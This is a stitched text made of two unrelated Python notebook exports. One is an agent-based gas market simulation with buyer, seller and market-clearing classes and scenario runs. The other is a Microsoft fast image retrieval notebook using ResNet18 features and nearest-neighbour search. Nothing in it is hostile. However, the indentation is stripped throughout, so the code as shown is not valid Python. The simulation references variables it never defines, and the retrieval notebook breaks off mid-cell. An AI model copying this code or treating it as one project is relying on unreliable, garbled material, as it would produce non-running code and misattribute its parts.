def set_quantity(self):
self.count = 0
self.update_price()
n = self.prod
l = self.lb_price + self.lb_multiplier
u = self.ub_price + self.ub_multiplier
wta = []
for i in range(n):
p = rnd.uniform(l, u)
wta.append(p)
if len(wta) < self.reserve:
self.wta = wta
else:
self.wta = wta[0:(self.reserve-1)]
self.prod = self.reserve
if len(self.wta) > 0:
self.wta = self.wta #sorted(self.wta, reverse=False)
self.q_to_market = len(self.wta)
def get_name(self):
return self.name
def get_asks(self):
return self.wta
def extract(self, cur_extraction):
if self.reserve > 0:
self.reserve = self.reserve - cur_extraction
else:
self.prod = 0
# production costs rise a 100%
def update_price(self):
depletion = (self.init_reserve - self.reserve) / self.init_reserve
self.ub_multiplier = int(self.ub_price * depletion)
self.lb_multiplier = int(self.lb_price * depletion)
def return_not_cleared(self, not_cleared):
self.count = self.count + (len(self.wta) - len(not_cleared))
self.wta = not_cleared
def get_price(self, price):
self.last_price = price
def update_production(self):
if (self.step/12).is_integer():
if self.prod > 0 and self.q_to_market > 0:
rp_ratio = self.reserve / self.prod
self.ratio_sold = self.count / self.q_to_market
self.ratio_sold_hist.append(self.ratio_sold)
yearly_average = statistics.mean(self.ratio_sold_hist[-12:])
if (rp_ratio > 15) and (yearly_average > .9):
self.prod = int(self.prod * 1.1)
if print_details:
print("%s evaluate production" % self.name)
if (self.unproven_reserve > 0) and (self.cur_scenario == 'PACES'):
self.reserve = self.reserve + int(0.1 * self.init_unproven_reserve)
self.unproven_reserve = self.unproven_reserve - int(0.1 * self.init_unproven_reserve)
def evaluate_timestep(self):
self.update_production()
# record every step into a dictionary; not pythonic, look into vars()
def book_keeping(self):
self.state_hist[self.step] = self.__dict__
class Buyer():
def __init__(self, name):
self.name = name
self.type = 0
self.rof = 0
self.wtp = []
self.step = 0
self.offset= 0
self.base_demand = 0
self.max_demand = 0
self.lb_price = 10
self.ub_price = 20
self.last_price = 15
self.subscr_market = {}
self.state_hist = {}
self.cur_scenario = ''
self.count = 0
self.real_demand = 0
self.storage_cap = 1
self.storage = 0
self.storage_q = 0
# the supplier has n quantities that they can buy
# they may be willing to sell this quantity anywhere from a lower price of l
# to a higher price of u
def set_quantity(self):
self.count = 0
self.update_price()
n = int(self.consumption(self.step))
l = self.lb_price
u = self.ub_price
wtp = []
for i in range(n):
p = rnd.uniform(l, u)
wtp.append(p)
self.wtp = wtp #sorted(wtp, reverse=True)
# gets a little too obvious
def get_name(self):
return self.name
# return list of willingness to pay
def get_bids(self):
return self.wtp
def consumption(self, x):
# make it initialise to seller
b = self.base_demand
m = self.max_demand
y = b + m * (.5 * (1 + np.cos(((x+self.offset)/6)*np.pi)))
self.real_demand = y
s = self.storage_manager()
return(y+s)
def update_price(self):
# adjust Q
if self.type == 1: #home
if (self.step/12).is_integer():
self.base_demand = home_savings[self.cur_scenario] * self.base_demand
self.max_demand = home_savings[self.cur_scenario] * self.max_demand
if self.type == 2: # elec for eu + us
if (self.step/12).is_integer():
cur_elec_df = elec_space['RELATIVE'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
#change_in_demand = cur_elec_df[index_year]
self.base_demand = self.base_demand * cur_elec_df[index_year]
self.max_demand = self.max_demand * cur_elec_df[index_year]
if self.type == 3: #indu
if (self.step/12).is_integer():
if (self.rof == 0) and (self.cur_scenario == 'PACES'):
#cur_df = economic_growth['ECONOMIC GROWTH'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
#growth = cur_df[index_year]
growth = np.arctan((index_year-2013)/10)/(.5*np.pi)*.05+0.03
self.base_demand = (1 + growth) * self.base_demand
self.max_demand = (1 + growth) * self.max_demand
else:
cur_df = economic_growth['ECONOMIC GROWTH'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
growth = cur_df[index_year]
self.base_demand = (1 + growth) * self.base_demand
self.max_demand = (1 + growth) * self.max_demand
## adjust P: now in get_price, but address later
## moved to get_price, rename update_price function (?)
#self.lb_price = self.last_price * .75
#self.ub_price= self.last_price * 1.25
def return_not_cleared(self, not_cleared):
self.count = self.count + (len(self.wtp)-len(not_cleared))
self.wtp = not_cleared
def get_price(self, price):
self.last_price = price
if self.last_price > 100:
self.last_price = 100
self.lb_price = self.last_price * .75
self.ub_price= self.last_price * 1.25
# writes complete state to a dictionary, see if useful
def book_keeping(self):
self.state_hist[self.step] = self.__dict__
# there has to be some accountability for uncleared bids of the buyers
def evaluate_timestep(self):
if self.type==1:
not_cleared = len(self.wtp)
#total_demand = self.real_demand + self.storage_q
storage_delta = self.storage_q - not_cleared
self.storage = self.storage + storage_delta
if print_details:
print(self.name, storage_delta)
def storage_manager(self):
# check if buyer is household buyer
if self.type==1:
if self.storage < 0:
self.storage_q = -self.storage
else:
self.storage_q = 0
return(self.storage_q)
else:
return(0)
```
## Construct the market
For the market two classes are made. The market itself, which controls the buyers and the sellers, and the book. The market has a book where the results of the clearing procedure are stored.
```
# the book is an object of the market used for the clearing procedure
class Book():
def __init__(self):
self.ledger = pd.DataFrame(columns = ("role","name","price","cleared"))
def set_asks(self,seller_list):
# ask each seller their name
# ask each seller their willingness
# for each willingness append the data frame
for seller in seller_list:
seller_name = seller.get_name()
seller_price = seller.get_asks()
ar_role = np.full((1,len(seller_price)),'seller', dtype=object)
ar_name = np.full((1,len(seller_price)),seller_name, dtype=object)
ar_cleared = np.full((1,len(seller_price)),'in process', dtype=object)
temp_ledger = pd.DataFrame([*ar_role,*ar_name,seller_price,*ar_cleared]).T
temp_ledger.columns= ["role","name","price","cleared"]
self.ledger = pd.concat([self.ledger, temp_ledger], ignore_index=True)
def set_bids(self,buyer_list):
# ask each seller their name
# ask each seller their willingness
# for each willingness append the data frame
for buyer in buyer_list:
buyer_name = buyer.get_name()
buyer_price = buyer.get_bids()
ar_role = np.full((1,len(buyer_price)),'buyer', dtype=object)
ar_name = np.full((1,len(buyer_price)),buyer_name, dtype=object)
ar_cleared = np.full((1,len(buyer_price)),'in process', dtype=object)
temp_ledger = pd.DataFrame([*ar_role,*ar_name,buyer_price,*ar_cleared]).T
temp_ledger.columns= ["role","name","price","cleared"]
self.ledger = pd.concat([self.ledger, temp_ledger], ignore_index=True)
def update_ledger(self,ledger):
self.ledger = ledger
def get_ledger(self):
return self.ledger
def clean_ledger(self):
self.ledger = pd.DataFrame(columns = ("role","name","price","cleared"))
class Market():
def __init__(self, name):
self.name= name
self.count = 0
self.last_price = ''
self.book = Book()
self.b = []
self.s = []
self.buyer_list = []
self.seller_list = []
self.buyer_dict = {}
self.seller_dict = {}
self.ledger = ''
self.seller_analytics = {}
self.buyer_analytics = {}
def book_keeping_all(self):
for i in self.buyer_dict:
self.buyer_dict[i].book_keeping()
for i in self.seller_dict:
self.seller_dict[i].book_keeping()
def add_buyer(self,buyer):
if buyer.subscr_market[self.name] == 1:
self.buyer_list.append(buyer)
def add_seller(self,seller):
if seller.subscr_market[self.name] == 1:
self.seller_list.append(seller)
def set_book(self):
self.book.set_bids(self.buyer_list)
self.book.set_asks(self.seller_list)
def get_bids(self):
# this is a data frame
ledger = self.book.get_ledger()
rows= ledger.loc[ledger['role'] == 'buyer']
# this is a series
prices=rows['price']
# this is a list
bids = prices.tolist()
return bids
def get_asks(self):
# this is a data frame
ledger = self.book.get_ledger()
rows = ledger.loc[ledger['role'] == 'seller']
# this is a series
prices=rows['price']
# this is a list
asks = prices.tolist()
return asks
# return the price at which the market clears
# this fails because there are more buyers than sellers
def get_clearing_price(self):
# buyer makes a bid starting with the buyer which wants it most
b = self.get_bids()
s = self.get_asks()
# highest to lowest
self.b=sorted(b, reverse=True)
# lowest to highest
self.s=sorted(s, reverse=False)
# find out whether there are more buyers or sellers
# then drop the excess buyers or sellers; they won't compete
n = len(b)
m = len(s)
# there are more sellers than buyers
# drop off the highest priced sellers
if (m > n):
s = s[0:n]
matcher = n
# There are more buyers than sellers
# drop off the lowest bidding buyers
else:
b = b[0:m]
matcher = m
# -It's possible that not all items sold actually clear the market here
# -Produces an error when one of the two lists are empty
# something like 'can't compare string and float'
count = 0
for i in range(matcher):
if (self.b[i] > self.s[i]):
count +=1
self.last_price = self.b[i]
# copy count to market object
self.count = count
return self.last_price
# TODO: Annotate the ledger
# this procedure takes up 80% of processing time
def annotate_ledger(self,clearing_price):
ledger = self.book.get_ledger()
# logic test
# b or s can not be zero, probably error or unreliable results
# so annotate everything as false in that case and move on
b = self.get_bids()
s = self.get_asks()
if (len(s)==0 or len(b)==0):
new_col = [ 'False' for i in range(len(ledger['cleared']))]
ledger['cleared'] = new_col
self.book.update_ledger(ledger)
return
# end logic test
for index, row in ledger.iterrows():
if (row['role'] == 'seller'):
if (row['price'] < clearing_price):
ledger.loc[index,'cleared'] = 'True'
else:
ledger.loc[index,'cleared'] = 'False'
else:
if (row['price'] > clearing_price):
ledger.loc[index,'cleared'] = 'True'
else:
ledger.loc[index,'cleared'] = 'False'
self.book.update_ledger(ledger)
def get_units_cleared(self):
return self.count
def clean_ledger(self):
self.ledger = ''
self.book.clean_ledger()
def run_it(self):
self.pre_clearing_operation()
self.clearing_operation()
self.after_clearing_operation()
# pre clearing empty out the last run and start
# clean ledger is kind of sloppy, rewrite functions to override the ledger
def pre_clearing_operation(self):
self.clean_ledger()
def clearing_operation(self):
self.set_book()
clearing_price = self.get_clearing_price()
if print_details:
print(self.name, clearing_price)
self.annotate_ledger(clearing_price)
def after_clearing_operation(self):
for agent in self.seller_list:
name = agent.name
cur_extract = len(self.book.ledger[(self.book.ledger['cleared'] == 'True') &
(self.book.ledger['name'] == name)])
agent.extract(cur_extract)
agent.get_price(self.last_price)
self.seller_analytics[name] = cur_extract
if cur_extract >0:
agent_asks = agent.get_asks()
agent_asks = sorted(agent_asks, reverse=False)
not_cleared = agent_asks[cur_extract:len(agent_asks)]
agent.return_not_cleared(not_cleared)
for agent in self.buyer_list:
name = agent.name
cur_extract = len(self.book.ledger[(self.book.ledger['cleared'] == 'True') &
(self.book.ledger['name'] == name)])
agent.get_price(self.last_price)
self.buyer_analytics[name] = cur_extract
if cur_extract >0:
agent_bids = agent.get_bids()
agent_bids = sorted(agent_bids, reverse=True)
not_cleared = agent_bids[cur_extract:len(agent_bids)]
agent.return_not_cleared(not_cleared)
# cleaning up the books
self.book_keeping_all()
```
## Observer
The observer holds the clock and collects data. In this setup it tells the market that another tick has passed and it is time to act. The market will instruct the other agents. The observer initializes the model, thereby making real objects out of the classes defined above.
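A stripped-down version of this control flow, with stub agents standing in for the Buyer/Seller/Market classes of this notebook (`step`, `set_quantity`, `run_it`, and `evaluate_timestep` mirror the method names used here; the stubs themselves are illustrative only):

```python
class StubAgent:
    """Placeholder for a Buyer or Seller."""
    def __init__(self):
        self.step = 0
    def set_quantity(self):
        pass  # a real agent would redraw its bids/asks here
    def evaluate_timestep(self):
        pass  # a real agent would update storage, production, etc.

class StubMarket:
    """Placeholder for a Market; counts clearing rounds."""
    def __init__(self):
        self.rounds = 0
    def run_it(self):
        self.rounds += 1  # a real market would build the book and clear it

def run_simulation(agents, market, timesteps):
    # the observer's clock: advance every agent, clear the market, evaluate
    for _ in range(timesteps):
        for a in agents:
            a.step += 1
            a.set_quantity()
        market.run_it()
        for a in agents:
            a.evaluate_timestep()

agents = [StubAgent(), StubAgent()]
market = StubMarket()
run_simulation(agents, market, 12)  # one simulated year of monthly ticks
```

The Observer class below follows the same advance-clear-evaluate cycle, with the extra bookkeeping needed to record history and scenarios.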
```
class Observer():
def __init__(self, init_buyer, init_seller, timesteps, scenario):
self.init_buyer = init_buyer
self.init_seller = init_seller
self.init_market = init_market
self.maxrun = timesteps
self.cur_scenario = scenario
self.buyer_dict = {}
self.seller_dict = {}
self.market_dict = {}
self.timetick = 0
self.gas_market = ''
self.market_hist = []
self.seller_hist = []
self.buyer_hist = []
self.market_origin = []
self.market_origin_df = pd.DataFrame(columns=['seller_analytics','buyer_analytics'])
self.all_data = {}
def set_buyer(self, buyer_info):
for name in buyer_info:
self.buyer_dict[name] = Buyer('%s' % name)
self.buyer_dict[name].offset = buyer_info[name]['offset']
self.buyer_dict[name].base_demand = buyer_info[name]['b']
self.buyer_dict[name].max_demand = buyer_info[name]['m']
self.buyer_dict[name].lb_price = buyer_info[name]['lb_price']
self.buyer_dict[name].ub_price = buyer_info[name]['ub_price']
self.buyer_dict[name].type = buyer_info[name]['type']
self.buyer_dict[name].rof = buyer_info[name]['rof']
self.buyer_dict[name].cur_scenario = self.cur_scenario
self.buyer_dict[name].subscr_market = dict.fromkeys(init_market,0)
for market in buyer_info[name]['market']:
self.buyer_dict[name].subscr_market[market] = 1
def set_seller(self, seller_info):
for name in seller_info:
self.seller_dict[name] = Seller('%s' % name)
self.seller_dict[name].prod = seller_info[name]['prod']
self.seller_dict[name].lb_price = seller_info[name]['lb_price']
self.seller_dict[name].ub_price = seller_info[name]['ub_price']
self.seller_dict[name].reserve = seller_info[name]['reserve']
self.seller_dict[name].init_reserve = seller_info[name]['reserve']
self.seller_dict[name].unproven_reserve = seller_info[name]['UP_reserve']
self.seller_dict[name].init_unproven_reserve = seller_info[name]['UP_reserve']
#self.seller_dict[name].rof = seller_info[name]['rof']
self.seller_dict[name].cur_scenario = self.cur_scenario
self.seller_dict[name].subscr_market = dict.fromkeys(init_market,0)
for market in seller_info[name]['market']:
self.seller_dict[name].subscr_market[market] = 1
def set_market(self, market_info):
for name in market_info:
self.market_dict[name] = Market('%s' % name)
# add suppliers and buyers to this market
for supplier in self.seller_dict.values():
self.market_dict[name].add_seller(supplier)
for buyer in self.buyer_dict.values():
self.market_dict[name].add_buyer(buyer)
self.market_dict[name].seller_dict = self.seller_dict
self.market_dict[name].buyer_dict = self.buyer_dict
def update_buyer(self):
for i in self.buyer_dict:
self.buyer_dict[i].step += 1
self.buyer_dict[i].set_quantity()
def update_seller(self):
for i in self.seller_dict:
self.seller_dict[i].step += 1
self.seller_dict[i].set_quantity()
def evaluate_timestep(self):
for i in self.buyer_dict:
self.buyer_dict[i].evaluate_timestep()
for i in self.seller_dict:
self.seller_dict[i].evaluate_timestep()
def get_reserve(self):
reserve = []
for name in self.seller_dict:
reserve.append(self.seller_dict[name].reserve)
return reserve
def get_data(self):
for name in self.seller_dict:
self.all_data[name] = self.seller_dict[name].state_hist
for name in self.buyer_dict:
self.all_data[name] = self.buyer_dict[name].state_hist
def run_it(self):
# Timing
# time initialising
startit_init = time.time()
# initialise, setting up all the agents (first_run is not really needed anymore since it is outside the loop;
# it might become useful again if run_it is used for a parameter sweep)
first_run = True
if first_run:
self.set_buyer(self.init_buyer)
self.set_seller(self.init_seller)
self.set_market(self.init_market)
first_run=False
# time init stop
stopit_init = time.time() - startit_init
if print_details:
print('%s : initialisation time' % stopit_init)
# building the multiindex for origin dataframe
listing = []
for m in self.market_dict:
listing_buyer = [(runname, m,'buyer_analytics',v.name) for v in self.market_dict[m].buyer_list]
listing = listing + listing_buyer
listing_seller = [(runname, m,'seller_analytics',v.name) for v in self.market_dict[m].seller_list]
listing = listing + listing_seller
multi_listing = pd.MultiIndex.from_tuples(listing)
# recording everything in dataframes, more dependable than lists?
#reserve_df = pd.DataFrame(data=None, columns=[i for i in self.seller_dict])
#iterables = [[i for i in self.market_dict], ['buyer_analytics', 'seller_analytics']]
#index = pd.MultiIndex.from_product(iterables)
market_origin_df = pd.DataFrame(data=None, columns=multi_listing)
for period in range(self.maxrun):
# time the period
startit_period = time.time()
self.timetick += 1
period_now = add_months(period_null, self.timetick-1)
if print_details:
print('#######################################')
print(period_now.strftime('%Y-%b'), self.cur_scenario)
# update the buyers and sellers (timetick+ set Q)
self.update_buyer()
self.update_seller()
# real action on the market
for market in self.market_dict:
if market != 'lng':
self.market_dict[market].run_it()
self.market_dict['lng'].run_it()
# tell agents the timetick has passed
self.evaluate_timestep()
# data collection
for name in self.market_dict:
p_clearing = self.market_dict[name].last_price
q_sold = self.market_dict[name].count
self.market_hist.append([period_now.strftime('%Y-%b'), p_clearing, q_sold, name])
for name in self.seller_dict:
reserve = self.seller_dict[name].reserve
produced = self.seller_dict[name].count
self.seller_hist.append([period_now.strftime('%Y-%b'), reserve, produced, name])
for name in self.buyer_dict:
storage = self.buyer_dict[name].storage
consumed = self.buyer_dict[name].count
self.buyer_hist.append([period_now.strftime('%Y-%b'), storage, consumed, name])
# capture the origin of goods sold on the market;
# the analytics dictionaries are shared objects that are overwritten each period,
# so a DataFrame is used to snapshot the actual values
for name in self.market_dict:
seller_analytics = self.market_dict[name].seller_analytics
buyer_analytics = self.market_dict[name].buyer_analytics
for seller in seller_analytics:
market_origin_df.loc[period_now.strftime('%Y-%b'),
(runname, name,'seller_analytics',seller)] = seller_analytics[seller]
for buyer in buyer_analytics:
market_origin_df.loc[period_now.strftime('%Y-%b'),
(runname, name,'buyer_analytics',buyer)] = buyer_analytics[buyer]
# recording the step_info
# since this operation can take quite a while, print after every operation
period_time = time.time() - startit_period
if print_details:
print('%.2f : seconds to clear period' % period_time)
# save df as attribute
self.market_origin_df = market_origin_df
```
## Example Market
In the following code example we use the buyer and seller objects to create a market. At the market a single price is announced, which causes as many units of goods to be exchanged as possible. The buyers and sellers stop trading when it is no longer in their own interest to continue.
```
# import scenarios
inputfile = 'economic growth scenarios.xlsx'
# economic growth percentages
economic_growth = pd.read_excel(inputfile, sheet_name='ec_growth', index_col=0, header=[0,1])
## demand for electricity import scenarios spaced by excel
#elec_space = pd.read_excel(inputfile, sheet_name='elec_space', skiprows=1, index_col=0, header=0)
# demand for electricity import scenarios spaced by excel
elec_space = pd.read_excel(inputfile, sheet_name='elec_space', index_col=0, header=[0,1])
# gasdemand home (percentage increases)
home_savings = {'PACES': 1.01, 'TIDES': .99, 'CIRCLES': .97}
# multilevel ecgrowth
economic_growth2 = pd.read_excel(inputfile, sheet_name='ec_growth', index_col=0, header=[0,1])
#economic_growth2['ECONOMIC GROWTH']
# reading excel initialization data back
read_file = 'init_buyers_sellers_lng.xlsx'
df_buyer = pd.read_excel(read_file, sheet_name='buyers')
df_seller = pd.read_excel(read_file, sheet_name='sellers')
# the 'market' column stores lists as strings; literal_eval is safer than eval
import ast
df_buyer['market'] = [ast.literal_eval(i) for i in df_buyer['market'].values]
df_seller['market'] = [ast.literal_eval(i) for i in df_seller['market'].values]
init_buyer = df_buyer.to_dict('index')
init_seller = df_seller.to_dict('index')
#init_market = {'eu', 'us','as'}, construct markets by unique values
market = []
for i in init_seller:
for x in init_seller[i]['market']: market.append(x)
for i in init_buyer:
for x in init_buyer[i]['market']: market.append(x)
market = list(set(market))
init_market = market
# set the starting time
period_null = datetime.date(2013, 1, 1)
```
## run the model
To run the model we create the observer. The observer creates all the other objects and runs the model.
```
# create observer and run the model
# first data about buyers then sellers and then model ticks
years = 35
# timestep = 12
print_details = False
run_market = {}
run_seller = {}
run_buyer = {}
run_market_origin = {}
run_market_origin_df = {}
for i in ['PACES', 'CIRCLES', 'TIDES']:
runname = i
dtrunstart = datetime.datetime.now()
print('\n%s scenario %d year run started' %(i,years))
obser1 = Observer(init_buyer, init_seller, years*12, i)
obser1.run_it()
#get the info from the observer
run_market[i] = obser1.market_hist
run_seller[i] = obser1.seller_hist
run_buyer[i] = obser1.buyer_hist
run_market_origin_df[i] = obser1.market_origin_df
#run_data[i] = obser1.all_data
dtrunstop = datetime.datetime.now()
print('%s scenario %d year run finished' %(i,years))
print('this run took %s (h:m:s) to complete'% (dtrunstop - dtrunstart))
# timeit
stopit = time.time()
dtstopit = datetime.datetime.now()
print('it took us %s seconds to get to this conclusion' % (stopit-startit))
print('in another notation (h:m:s) %s'% (dtstopit - dtstartit))
```
## Operations Research Formulation
The market can also be formulated as a very simple linear program or linear complementarity problem, although it is clearer and easier to implement this clearing mechanism with agents. One merit of the agent-based approach is that we do not need linear or linearizable supply and demand functions.
The auctioneer is effectively following a very simple linear program subject to constraints on units sold. The auctioneer is, in the primal model, maximizing the consumer utility received by customers, with respect to the price being paid, subject to a fixed supply curve. On the dual side the auctioneer is minimizing the cost of production for the supplier, with respect to quantity sold, subject to a fixed demand curve. It is the presumed neutrality of the auctioneer which justifies the honest statement of supply and demand.
An alternative formulation is a linear complementarity problem. Here the presence of an optimal space of trades ensures that there is a Pareto optimal front of possible trades. The perfect opposition of interests in dividing the consumer and producer surplus means that this is a zero sum game. Furthermore the solution to this zero-sum game maximizes societal welfare and is therefore the Hicks optimal solution.
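As an illustration of the primal formulation, the sketch below clears a toy one-shot market as a linear program with SciPy. The bid and ask values are made-up numbers for illustration, not data from the model above.

```python
# Toy market clearing as a linear program (illustrative values, not model data).
# Maximize total surplus: sum(bid_i * x_i) - sum(ask_j * y_j)
# subject to market balance sum(x) == sum(y) and unit lots 0 <= x, y <= 1.
from scipy.optimize import linprog

bids = [10, 9, 7, 4]  # buyers' willingness to pay
asks = [3, 5, 6, 8]   # sellers' costs

n, m = len(bids), len(asks)
c = [-b for b in bids] + list(asks)  # linprog minimizes, so negate the bids
A_eq = [[1.0] * n + [-1.0] * m]      # sum(x) - sum(y) = 0
b_eq = [0.0]
bounds = [(0, 1)] * (n + m)

res = linprog(c, A_eq=A_eq, b_eq=b_eq, bounds=bounds, method="highs")
x, y = res.x[:n], res.x[n:]
print("units traded:", round(sum(x)))        # only the profitable bid/ask pairs clear
print("total surplus:", round(-res.fun, 2))  # (10-3) + (9-5) + (7-6) = 12
```

The agent-based auctioneer reaches the same allocation by matching sorted bids and asks until no profitable trade remains; the LP simply makes the welfare maximization explicit.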
## Next Steps
A possible addition to this model would be a weekly varying customer demand, for instance driven by the use of natural gas for heating. This would require the bids and asks to be time-varying, and the market to be run over successive time periods. A second addition would be to introduce transport costs, or to enable intermediate goods to be produced; this would need a more elaborate market operator. Another possible addition is a profit-maximizing broker, which may require adding beliefs, fictitious play, or message passing.
The object orientation of the models will probably need to be rationalized further: right now the market requires a very particular ordering of calls to function correctly.
## Time of last run
Time and date of the last run of this notebook file
```
# print the time of last run
print('last run of this notebook:')
time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())
```
## Plotting scenario runs
For the scenario runs we vary the external factors according to the scenarios. The real plotting is done in a separate visualization file.
```
plt.subplots()
for market in init_market:
for i in run_market:
run_df = pd.DataFrame(run_market[i])
run_df = run_df[run_df[3]==market]
run_df.set_index(0, inplace=True)
run_df.index = pd.to_datetime(run_df.index)
run_df.index.name = 'month'
run_df.rename(columns={1: 'price', 2: 'quantity'}, inplace=True)
run_df = run_df['price'].resample('A').mean().plot(label=i, title=market)
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.ylabel('€/MWh')
plt.xlabel('Year')
plt.show();
```
### saving data for later
To keep this file as clear as possible, and for efficiency, we visualize the results in a separate file. To transfer the model run data we use the JSON library (and possibly Excel).
```
today = datetime.date.today().strftime('%Y%m%d')
outputexcel = r'.\exceloutput\%srun.xlsx' % today
writer = pd.ExcelWriter(outputexcel)
def write_to_excel():
for i in run_market:
run_df = pd.DataFrame(run_market[i])
run_df.set_index(0, inplace=True)
run_df.index = pd.to_datetime(run_df.index)
run_df.index.name = 'month'
run_df.rename(columns={1: 'price', 2: 'quantity'}, inplace=True)
run_df.to_excel(writer, sheet_name=i)
# uncomment if wanted to write to excel file
#write_to_excel()
# Writing JSON data
# market data
data = run_market
with open('marketdata.json', 'w') as f:
json.dump(data, f)
# seller/reserve data
data = run_seller
with open('sellerdata.json', 'w') as f:
json.dump(data, f)
# buyer data
data = run_buyer
with open('buyerdata.json', 'w') as f:
json.dump(data, f)
# complex dataframes do not work well with Json, so use Pickle
# Merge Dataframes
result = pd.concat([run_market_origin_df[i] for i in run_market_origin_df], axis=1)
#pickle does the job
result.to_pickle('marketdataorigin.pickle', compression='infer', protocol=4)
# check that the complex dataframes round-trip as expected
df_pickle = result
for i in df_pickle.columns.levels[0]:
scen=i
market='eu'
df = df_pickle[scen][market]['seller_analytics']
df.index = pd.to_datetime(df.index)
df.resample('A').sum().plot.area(title='%s %s'%(scen,market))
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
plt.show()
```
<i>Copyright (c) Microsoft Corporation. All rights reserved.</i>
<i>Licensed under the MIT License.</i>
# Fast image retrieval
In the notebook [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) we perform image retrieval by computing the distances between a query image and *all* reference images. While computing the L2 distance between two images is fast, for large datasets of tens of thousands of images this exhaustive search can be a bottleneck for real-time applications.
To speed up image retrieval, this notebook shows how to implement an approximate nearest neighbor method designed to work well for large datasets (N) and high-dimensional features (D). For example, the well-known Ball Tree approach has a complexity of O\[D\*log(N)\], compared to O\[D\*N\] for exhaustive search.
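As a minimal sketch of that difference (the synthetic data and parameter choices below are ours, not from this repository), both a brute-force and a ball-tree index can be built with the same scikit-learn class. Since both are exact, they return the same neighbors; the tree amortizes query cost on large datasets.

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

rng = np.random.default_rng(0)
X = rng.standard_normal((20_000, 64)).astype(np.float32)  # synthetic reference features
q = rng.standard_normal((1, 64)).astype(np.float32)       # one synthetic query feature

nn_brute = NearestNeighbors(algorithm="brute", metric="euclidean").fit(X)
nn_tree = NearestNeighbors(algorithm="ball_tree", metric="euclidean").fit(X)

# Both methods are exact, so the retrieved neighbors agree;
# the ball tree trades a one-off build cost for faster queries.
d_brute, i_brute = nn_brute.kneighbors(q, n_neighbors=5)
d_tree, i_tree = nn_tree.kneighbors(q, n_neighbors=5)
assert (i_brute == i_tree).all()
```

Note that tree-based methods lose their advantage as the dimensionality D grows, which is one reason to let `algorithm='auto'` (used later in this notebook) pick a suitable strategy.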
## Initialization
```
# Ensure edits to libraries are loaded and plotting is shown in the notebook.
%matplotlib inline
%reload_ext autoreload
%autoreload 2
# Standard python libraries
import sys
import numpy as np
from pathlib import Path
import random
import scrapbook as sb
from sklearn.neighbors import NearestNeighbors
from tqdm import tqdm
# Fast.ai
import fastai
from fastai.vision import (
load_learner,
cnn_learner,
DatasetType,
ImageList,
imagenet_stats,
models,
PIL
)
# Computer Vision repository
sys.path.extend([".", "../.."]) # to access the utils_cv library
from utils_cv.classification.data import Urls
from utils_cv.common.data import unzip_url
from utils_cv.common.gpu import which_processor, db_num_workers
from utils_cv.similarity.metrics import compute_distances
from utils_cv.similarity.model import compute_features_learner
from utils_cv.similarity.plot import plot_distances, plot_ranks_distribution
print(f"Fast.ai version = {fastai.__version__}")
which_processor()
```
## Data preparation
We start with parameter specifications and data preparation. We use the *Fridge objects* dataset, which is composed of 134 images, divided into 4 classes: can, carton, milk bottle and water bottle.
```
# Data location
DATA_PATH = unzip_url(Urls.fridge_objects_path, exist_ok=True)
# Image reader configuration
BATCH_SIZE = 16
IM_SIZE = 300
# Number of comparison of nearest neighbor versus exhaustive search for accuracy computation
NUM_RANK_ITER = 100
# Load images into fast.ai's ImageDataBunch object
random.seed(642)
data = (
ImageList.from_folder(DATA_PATH)
.split_by_rand_pct(valid_pct=0.8, seed=20)
.label_from_folder()
.transform(size=IM_SIZE)
.databunch(bs=BATCH_SIZE, num_workers = db_num_workers())
.normalize(imagenet_stats)
)
print(f"Training set: {len(data.train_ds.x)} images, validation set: {len(data.valid_ds.x)} images")
```
## Load model
Below we load a [ResNet18](https://arxiv.org/pdf/1512.03385.pdf) CNN from fast.ai's library which is pre-trained on ImageNet.
```
# learn = cnn_learner(data, models.resnet18, ps=0)
#print(DATA_PATH)
learn = load_learner(DATA_PATH, 'image_similarity_01_model')
learn.data = data
```
Alternatively, one can load a model which was trained using the [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) notebook using these lines of code:
```python
learn = load_learner(".", 'image_similarity_01_model')
learn.data = data
```
## Feature extraction
We now compute the DNN features for each image in our validation set. We use the output of the penultimate layer as our image representation, which, for the ResNet-18 model, has a dimensionality of 512 floating point values.
```
# Use penultimate layer as image representation
embedding_layer = learn.model[1][-2]
print(embedding_layer)
# Compute DNN features for all validation images
valid_features = compute_features_learner(data, DatasetType.Valid, learn, embedding_layer)
print(f"Computed DNN features for the {len(list(valid_features))} validation images,\
each consisting of {len(valid_features[list(valid_features)[0]])} floating point values.\n")
print(valid_features[list(valid_features)[0]])
```
## Image Retrieval Example
In the cells below, we demonstrate how to do fast image retrieval using scikit-learn's [NearestNeighbors](https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.NearestNeighbors.html) implementation. Note that we use the same approach to computing distances as in the [01_training_and_evaluation_introduction.ipynb](01_training_and_evaluation_introduction.ipynb) notebook, i.e. we normalize the feature vectors to unit length and choose the Euclidean distance.
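A quick sanity check of this design choice (a standalone sketch, not code from this repository): for unit-length vectors u and v, ||u − v||² = 2 − 2·cos(u, v), so ranking by Euclidean distance is equivalent to ranking by cosine similarity.

```python
import numpy as np

rng = np.random.default_rng(1)
u = rng.standard_normal(512)  # same dimensionality as the ResNet-18 features
v = rng.standard_normal(512)
u /= np.linalg.norm(u)  # normalize to unit length
v /= np.linalg.norm(v)

l2_squared = float(np.sum((u - v) ** 2))
cosine = float(u @ v)
# identity: squared L2 distance on unit vectors is 2 - 2 * cosine similarity
assert np.isclose(l2_squared, 2 - 2 * cosine)
```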
First, we build a nearest neighbor object using appropriately normalized features.
```
# Normalize all reference features to be of unit length
valid_features_list = np.array(list(valid_features.values()))
# print(valid_features_list[0])
valid_features_list /= np.linalg.norm(valid_features_list, axis=1)[:,None]
#print(np.array2string(valid_features_list, separator=', '))
test = ",".join(map(str,valid_features_list[0]))
import zipfile
from zipfile import ZipFile
f = open("ref_features.txt", 'w')
f.write('[')
f.writelines('],\n'.join('[' + ','.join(map(str,i)) for i in valid_features_list))
f.write(']]')
f.close()
print(DATA_PATH)
#print(list(valid_features.keys()))
